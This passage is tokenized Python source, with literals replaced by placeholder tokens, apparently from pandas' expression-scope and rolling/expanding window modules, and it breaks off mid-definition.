'<STR_LIT>' : datetime . datetime , <EOL> '<STR_LIT:True>' : True , <EOL> '<STR_LIT:False>' : False , <EOL> '<STR_LIT:list>' : list , <EOL> '<STR_LIT>' : tuple , <EOL> '<STR_LIT>' : np . inf , <EOL> '<STR_LIT>' : np . inf , <EOL> } <EOL> def _get_pretty_string ( obj ) : <EOL> """<STR_LIT>""" <EOL> sio = StringIO ( ) <EOL> pprint . pprint ( obj , stream = sio ) <EOL> return sio . getvalue ( ) <EOL> class Scope ( StringMixin ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT>' <EOL> def __init__ ( self , level , global_dict = None , local_dict = None , resolvers = ( ) , <EOL> target = None ) : <EOL> self . level = level + <NUM_LIT:1> <EOL> self . scope = DeepChainMap ( _DEFAULT_GLOBALS . copy ( ) ) <EOL> self . target = target <EOL> if isinstance ( local_dict , Scope ) : <EOL> self . scope . update ( local_dict . scope ) <EOL> if local_dict . target is not None : <EOL> self . target = local_dict . target <EOL> self . update ( local_dict . level ) <EOL> frame = sys . _getframe ( self . level ) <EOL> try : <EOL> self . scope = self . scope . new_child ( ( global_dict or <EOL> frame . f_globals ) . copy ( ) ) <EOL> if not isinstance ( local_dict , Scope ) : <EOL> self . scope = self . scope . new_child ( ( local_dict or <EOL> frame . f_locals ) . copy ( ) ) <EOL> finally : <EOL> del frame <EOL> if isinstance ( local_dict , Scope ) : <EOL> resolvers += tuple ( local_dict . resolvers . maps ) <EOL> self . resolvers = DeepChainMap ( * resolvers ) <EOL> self . temps = { } <EOL> def __unicode__ ( self ) : <EOL> scope_keys = _get_pretty_string ( list ( self . scope . keys ( ) ) ) <EOL> res_keys = _get_pretty_string ( list ( self . resolvers . keys ( ) ) ) <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , scope_keys , <EOL> res_keys ) <EOL> @ property <EOL> def has_resolvers ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( len ( self . resolvers ) ) <EOL> def resolve ( self , key , is_local ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if is_local : <EOL> return self . scope [ key ] <EOL> if self . has_resolvers : <EOL> return self . resolvers [ key ] <EOL> assert not is_local and not self . has_resolvers <EOL> return self . scope [ key ] <EOL> except KeyError : <EOL> try : <EOL> return self . temps [ key ] <EOL> except KeyError : <EOL> raise compu . ops . UndefinedVariableError ( key , is_local ) <EOL> def swapkey ( self , old_key , new_key , new_value = None ) : <EOL> """<STR_LIT>""" <EOL> if self . has_resolvers : <EOL> maps = self . resolvers . maps + self . scope . maps <EOL> else : <EOL> maps = self . scope . maps <EOL> maps . append ( self . temps ) <EOL> for mapping in maps : <EOL> if old_key in mapping : <EOL> mapping [ new_key ] = new_value <EOL> return <EOL> def _get_vars ( self , stack , scopes ) : <EOL> """<STR_LIT>""" <EOL> variables = itertools . product ( scopes , stack ) <EOL> for scope , ( frame , _ , _ , _ , _ , _ ) in variables : <EOL> try : <EOL> d = getattr ( frame , '<STR_LIT>' + scope ) <EOL> self . scope = self . scope . new_child ( d ) <EOL> finally : <EOL> del frame <EOL> def update ( self , level ) : <EOL> """<STR_LIT>""" <EOL> sl = level + <NUM_LIT:1> <EOL> stack = inspect . stack ( ) <EOL> try : <EOL> self . _get_vars ( stack [ : sl ] , scopes = [ '<STR_LIT>' ] ) <EOL> finally : <EOL> del stack [ : ] , stack <EOL> def add_tmp ( self , value ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' . format ( type ( value ) . __name__ , self . ntemps , <EOL> _raw_hex_id ( self ) ) <EOL> assert name not in self . temps <EOL> self . temps [ name ] = value <EOL> assert name in self . temps <EOL> return name <EOL> @ property <EOL> def ntemps ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . temps ) <EOL> @ property <EOL> def full_scope ( self ) : <EOL> """<STR_LIT>""" <EOL> maps = [ self . temps ] + self . resolvers . maps + self . scope . maps <EOL> return DeepChainMap ( * maps ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> import pandas as pd <EOL> from pandas . lib import isscalar <EOL> from pandas . core . base import ( PandasObject , SelectionMixin , <EOL> GroupByMixin ) <EOL> import pandas . core . common as com <EOL> import pandas . algos as algos <EOL> from pandas import compat <EOL> from pandas . util . decorators import Substitution , Appender <EOL> from textwrap import dedent <EOL> _shared_docs = dict ( ) <EOL> _doc_template = """<STR_LIT>""" <EOL> class _Window ( PandasObject , SelectionMixin ) : <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> exclusions = set ( ) <EOL> def __init__ ( self , obj , window = None , min_periods = None , freq = None , <EOL> center = False , win_type = None , axis = <NUM_LIT:0> , ** kwargs ) : <EOL> if freq is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , FutureWarning , stacklevel = <NUM_LIT:3> ) <EOL> self . blocks = [ ] <EOL> self . obj = obj <EOL> self . window = window <EOL> self . min_periods = min_periods <EOL> self . freq = freq <EOL> self . center = center <EOL> self . win_type = win_type <EOL> self . axis = obj . _get_axis_number ( axis ) if axis is not None else None <EOL> self . validate ( ) <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Window <EOL> def validate ( self ) : <EOL> if self . center is not None and not com . is_bool ( self . center ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . min_periods is not None and not com . is_integer ( self . min_periods ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _convert_freq ( self , how = None ) : <EOL> """<STR_LIT>""" <EOL> obj = self . _selected_obj <EOL> if ( self . freq is not None and <EOL> isinstance ( obj , ( com . ABCSeries , com . ABCDataFrame ) ) ) : <EOL> if how is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , FutureWarning , <EOL> stacklevel = <NUM_LIT:6> ) <EOL> obj = obj . resample ( self . freq ) . aggregate ( how or '<STR_LIT>' ) <EOL> return obj <EOL> def _create_blocks ( self , how ) : <EOL> """<STR_LIT>""" <EOL> obj = self . _convert_freq ( how ) <EOL> return obj . as_blocks ( copy = False ) . values ( ) , obj <EOL> def _gotitem ( self , key , ndim , subset = None ) : <EOL> """<STR_LIT>""" <EOL> if subset is None : <EOL> subset = self . obj <EOL> self = self . _shallow_copy ( subset ) <EOL> self . _reset_cache ( ) <EOL> if subset . ndim == <NUM_LIT:2> : <EOL> if isscalar ( key ) and key in subset or com . is_list_like ( key ) : <EOL> self . _selection = key <EOL> return self <EOL> def __getattr__ ( self , attr ) : <EOL> if attr in self . _internal_names_set : <EOL> return object . __getattribute__ ( self , attr ) <EOL> if attr in self . obj : <EOL> return self [ attr ] <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( type ( self ) . __name__ , attr ) ) <EOL> def _dir_additions ( self ) : <EOL> return self . obj . _dir_additions ( ) <EOL> def _get_window ( self , other = None ) : <EOL> return self . window <EOL> @ property <EOL> def _window_type ( self ) : <EOL> return self . __class__ . __name__ <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> attrs = [ "<STR_LIT>" . format ( k = k , v = getattr ( self , k ) ) <EOL> for k in self . _attributes <EOL> if getattr ( self , k , None ) is not None ] <EOL> return "<STR_LIT>" . format ( klass = self . _window_type , <EOL> attrs = '<STR_LIT:U+002C>' . join ( attrs ) ) <EOL> def _prep_values ( self , values = None , kill_inf = True , how = None ) : <EOL> if values is None : <EOL> values = getattr ( self . _selected_obj , '<STR_LIT>' , self . _selected_obj ) <EOL> if com . is_float_dtype ( values . dtype ) : <EOL> values = com . _ensure_float64 ( values ) <EOL> elif com . is_integer_dtype ( values . dtype ) : <EOL> values = com . _ensure_float64 ( values ) <EOL> elif com . needs_i8_conversion ( values . dtype ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> action = self . _window_type , <EOL> dtype = values . dtype ) ) <EOL> else : <EOL> try : <EOL> values = com . _ensure_float64 ( values ) <EOL> except ( ValueError , TypeError ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( values . dtype ) ) <EOL> if kill_inf : <EOL> values = values . copy ( ) <EOL> values [ np . isinf ( values ) ] = np . NaN <EOL> return values <EOL> def _wrap_result ( self , result , block = None , obj = None ) : <EOL> """<STR_LIT>""" <EOL> if obj is None : <EOL> obj = self . _selected_obj <EOL> index = obj . index <EOL> if isinstance ( result , np . ndarray ) : <EOL> if block is not None : <EOL> if com . is_timedelta64_dtype ( block . values . dtype ) : <EOL> result = pd . to_timedelta ( <EOL> result . ravel ( ) , unit = '<STR_LIT>' ) . values . reshape ( result . shape ) <EOL> if result . ndim == <NUM_LIT:1> : <EOL> from pandas import Series <EOL> return Series ( result , index , name = obj . name ) <EOL> return type ( obj ) ( result , index = index , columns = block . columns ) <EOL> return result <EOL> def _wrap_results ( self , results , blocks , obj ) : <EOL> """<STR_LIT>""" <EOL> final = [ ] <EOL> for result , block in zip ( results , blocks ) : <EOL> result = self . _wrap_result ( result , block = block , obj = obj ) <EOL> if result . ndim == <NUM_LIT:1> : <EOL> return result <EOL> final . append ( result ) <EOL> if not len ( final ) : <EOL> return obj . astype ( '<STR_LIT>' ) <EOL> return pd . concat ( final , axis = <NUM_LIT:1> ) . reindex ( columns = obj . columns ) <EOL> def _center_window ( self , result , window ) : <EOL> """<STR_LIT>""" <EOL> if self . axis > result . ndim - <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> from pandas import Series , DataFrame <EOL> offset = _offset ( window , True ) <EOL> if offset > <NUM_LIT:0> : <EOL> if isinstance ( result , ( Series , DataFrame ) ) : <EOL> result = result . slice_shift ( - offset , axis = self . axis ) <EOL> else : <EOL> lead_indexer = [ slice ( None ) ] * result . ndim <EOL> lead_indexer [ self . axis ] = slice ( offset , None ) <EOL> result = np . copy ( result [ tuple ( lead_indexer ) ] ) <EOL> return result <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> result , how = self . _aggregate ( arg , * args , ** kwargs ) <EOL> if result is None : <EOL> return self . apply ( arg , args = args , kwargs = kwargs ) <EOL> return result <EOL> agg = aggregate <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> class Window ( _Window ) : <EOL> """<STR_LIT>""" <EOL> def validate ( self ) : <EOL> super ( Window , self ) . validate ( ) <EOL> window = self . window <EOL> if isinstance ( window , ( list , tuple , np . ndarray ) ) : <EOL> pass <EOL> elif com . is_integer ( window ) : <EOL> try : <EOL> import scipy . signal as sig <EOL> except ImportError : <EOL> raise ImportError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not isinstance ( self . win_type , compat . string_types ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( self . win_type ) ) <EOL> if getattr ( sig , self . win_type , None ) is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( self . win_type ) ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( window ) ) <EOL> def _prep_window ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> window = self . _get_window ( ) <EOL> if isinstance ( window , ( list , tuple , np . ndarray ) ) : <EOL> return com . _asarray_tuplesafe ( window ) . astype ( float ) <EOL> elif com . is_integer ( window ) : <EOL> import scipy . signal as sig <EOL> def _validate_win_type ( win_type , kwargs ) : <EOL> arg_map = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:width>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:width>' ] } <EOL> if win_type in arg_map : <EOL> return tuple ( [ win_type ] + _pop_args ( win_type , <EOL> arg_map [ win_type ] , <EOL> kwargs ) ) <EOL> return win_type <EOL> def _pop_args ( win_type , arg_names , kwargs ) : <EOL> msg = '<STR_LIT>' % win_type <EOL> all_args = [ ] <EOL> for n in arg_names : <EOL> if n not in kwargs : <EOL> raise ValueError ( msg % n ) <EOL> all_args . append ( kwargs . pop ( n ) ) <EOL> return all_args <EOL> win_type = _validate_win_type ( self . win_type , kwargs ) <EOL> return sig . get_window ( win_type , window ) . astype ( float ) <EOL> def _apply_window ( self , mean = True , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> window = self . _prep_window ( ** kwargs ) <EOL> center = self . center <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> offset = _offset ( window , center ) <EOL> additional_nans = np . array ( [ np . NaN ] * offset ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _use_window ( self . min_periods , len ( window ) ) <EOL> return algos . roll_window ( np . concatenate ( ( arg , additional_nans ) ) <EOL> if center else arg , window , minp , <EOL> avg = mean ) <EOL> result = np . apply_along_axis ( f , self . axis , values ) <EOL> if center : <EOL> result = self . _center_window ( result , window ) <EOL> results . append ( result ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> result , how = self . _aggregate ( arg , * args , ** kwargs ) <EOL> if result is None : <EOL> result = arg ( self ) <EOL> return result <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return self . _apply_window ( mean = False , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return self . _apply_window ( mean = True , ** kwargs ) <EOL> class _GroupByMixin ( GroupByMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj , * args , ** kwargs ) : <EOL> parent = kwargs . pop ( '<STR_LIT>' , None ) <EOL> groupby = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if groupby is None : <EOL> groupby , obj = obj , obj . obj <EOL> self . _groupby = groupby <EOL> self . _groupby . mutated = True <EOL> self . _groupby . grouper . mutated = True <EOL> super ( GroupByMixin , self ) . __init__ ( obj , * args , ** kwargs ) <EOL> count = GroupByMixin . _dispatch ( '<STR_LIT:count>' ) <EOL> corr = GroupByMixin . _dispatch ( '<STR_LIT>' , other = None , pairwise = None ) <EOL> cov = GroupByMixin . _dispatch ( '<STR_LIT>' , other = None , pairwise = None ) <EOL> def _apply ( self , func , name , window = None , center = None , <EOL> check_minp = None , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def f ( x , name = name , * args ) : <EOL> x = self . _shallow_copy ( x ) <EOL> if isinstance ( name , compat . string_types ) : <EOL> return getattr ( x , name ) ( * args , ** kwargs ) <EOL> return x . apply ( name , * args , ** kwargs ) <EOL> return self . _groupby . apply ( f ) <EOL> class _Rolling ( _Window ) : <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Rolling <EOL> def _apply ( self , func , name = None , window = None , center = None , <EOL> check_minp = None , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if center is None : <EOL> center = self . center <EOL> if window is None : <EOL> window = self . _get_window ( ) <EOL> if check_minp is None : <EOL> check_minp = _use_window <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> if isinstance ( func , compat . string_types ) : <EOL> if not hasattr ( algos , func ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( func ) ) <EOL> cfunc = getattr ( algos , func ) <EOL> def func ( arg , window , min_periods = None ) : <EOL> minp = check_minp ( min_periods , window ) <EOL> return cfunc ( com . _ensure_float64 ( arg ) , <EOL> window , minp , ** kwargs ) <EOL> if center : <EOL> offset = _offset ( window , center ) <EOL> additional_nans = np . array ( [ np . NaN ] * offset ) <EOL> def calc ( x ) : <EOL> return func ( np . concatenate ( ( x , additional_nans ) ) , <EOL> window , min_periods = self . min_periods ) <EOL> else : <EOL> def calc ( x ) : <EOL> return func ( x , window , min_periods = self . min_periods ) <EOL> if values . ndim > <NUM_LIT:1> : <EOL> result = np . apply_along_axis ( calc , self . axis , values ) <EOL> else : <EOL> result = calc ( values ) <EOL> if center : <EOL> result = self . _center_window ( result , window ) <EOL> results . append ( result ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> class _Rolling_and_Expanding ( _Rolling ) : <EOL> _shared_docs [ '<STR_LIT:count>' ] = """<STR_LIT>""" <EOL> def count ( self ) : <EOL> obj = self . _convert_freq ( ) <EOL> window = self . _get_window ( ) <EOL> window = min ( window , len ( obj ) ) if not self . center else window <EOL> blocks , obj = self . _create_blocks ( how = None ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> if com . needs_i8_conversion ( b . values ) : <EOL> result = b . notnull ( ) . astype ( int ) <EOL> else : <EOL> try : <EOL> result = np . isfinite ( b ) . astype ( float ) <EOL> except TypeError : <EOL> result = np . isfinite ( b . astype ( float ) ) . astype ( float ) <EOL> result [ pd . isnull ( result ) ] = <NUM_LIT:0> <EOL> result = self . _constructor ( result , window = window , min_periods = <NUM_LIT:0> , <EOL> center = self . center ) . sum ( ) <EOL> results . append ( result ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> _level = kwargs . pop ( '<STR_LIT>' , None ) <EOL> window = self . _get_window ( ) <EOL> offset = _offset ( window , self . center ) <EOL> def f ( arg , window , min_periods ) : <EOL> minp = _use_window ( min_periods , window ) <EOL> return algos . roll_generic ( arg , window , minp , offset , func , args , <EOL> kwargs ) <EOL> return self . _apply ( f , func , args = args , kwargs = kwargs , <EOL> center = False ) <EOL> def sum ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def max ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def min ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> def mean ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def median ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> window = self . _get_window ( ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _require_min_periods ( <NUM_LIT:1> ) ( self . min_periods , window ) <EOL> return _zsqrt ( algos . roll_var ( arg , window , minp , ddof ) ) <EOL> return self . _apply ( f , '<STR_LIT>' , check_minp = _require_min_periods ( <NUM_LIT:1> ) , <EOL> ddof = ddof , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:1> ) , ddof = ddof , <EOL> ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = """<STR_LIT>""" <EOL> def skew ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:3> ) , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = """<STR_LIT>""" <EOL> def kurt ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:4> ) , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> window = self . _get_window ( ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _use_window ( self . min_periods , window ) <EOL> return algos . roll_quantile ( arg , window , minp , quantile ) <EOL> return self . _apply ( f , '<STR_LIT>' , quantile = quantile , <EOL> ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> window = self . _get_window ( other ) <EOL> def _get_cov ( X , Y ) : <EOL> X = X . astype ( '<STR_LIT>' ) <EOL> Y = Y . astype ( '<STR_LIT>' ) <EOL> mean = lambda x : x . rolling ( window , self . min_periods , <EOL> center = self . center ) . mean ( ** kwargs ) <EOL> count = ( X + Y ) . rolling ( window = window , <EOL> center = self . center ) . count ( ** kwargs ) <EOL> bias_adj = count / ( count - ddof ) <EOL> return ( mean ( X * Y ) - mean ( X ) * mean ( Y ) ) * bias_adj <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_cov , pairwise = bool ( pairwise ) ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> window = self . _get_window ( other ) <EOL> def _get_corr ( a , b ) : <EOL> a = a . rolling ( window = window , min_periods = self . min_periods , <EOL> freq = self . freq , center = self . center ) <EOL> b = b . rolling ( window = window , min_periods = self . min_periods , <EOL> freq = self . freq , center = self . center ) <EOL> return a . cov ( b , ** kwargs ) / ( a . std ( ** kwargs ) * b . std ( ** kwargs ) ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_corr , pairwise = bool ( pairwise ) ) <EOL> class Rolling ( _Rolling_and_Expanding ) : <EOL> """<STR_LIT>""" <EOL> def validate ( self ) : <EOL> super ( Rolling , self ) . validate ( ) <EOL> if not com . is_integer ( self . window ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( Rolling , self ) . aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT:count>' ] ) <EOL> def count ( self ) : <EOL> return super ( Rolling , self ) . count ( ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> return super ( Rolling , self ) . apply ( func , args = args , kwargs = kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . sum ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def max ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . max ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def min ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . min ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . mean ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def median ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . median ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . std ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . var ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def skew ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . skew ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def kurt ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . kurt ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> return super ( Rolling , self ) . quantile ( quantile = quantile , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . cov ( other = other , pairwise = pairwise , <EOL> ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> return super ( Rolling , self ) . corr ( other = other , pairwise = pairwise , <EOL> ** kwargs ) <EOL> class RollingGroupby ( _GroupByMixin , Rolling ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Rolling <EOL> class Expanding ( _Rolling_and_Expanding ) : <EOL> """<STR_LIT>""" <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , obj , min_periods = <NUM_LIT:1> , freq = None , center = False , axis = <NUM_LIT:0> , <EOL> ** kwargs ) : <EOL> return super ( Expanding , self ) . __init__ ( obj = obj , <EOL> min_periods = min_periods , <EOL> freq = freq , center = center , <EOL> axis = axis ) <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Expanding <EOL> def _get_window ( self , other = None ) : <EOL> obj = self . _selected_obj <EOL> if other is None : <EOL> return ( max ( len ( obj ) , self . min_periods ) if self . min_periods <EOL> else len ( obj ) ) <EOL> return ( max ( ( len ( obj ) + len ( obj ) ) , self . min_periods ) <EOL> if self . min_periods else ( len ( obj ) + len ( obj ) ) ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( Expanding , self ) . aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT:count>' ] ) <EOL> def count ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . count ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' 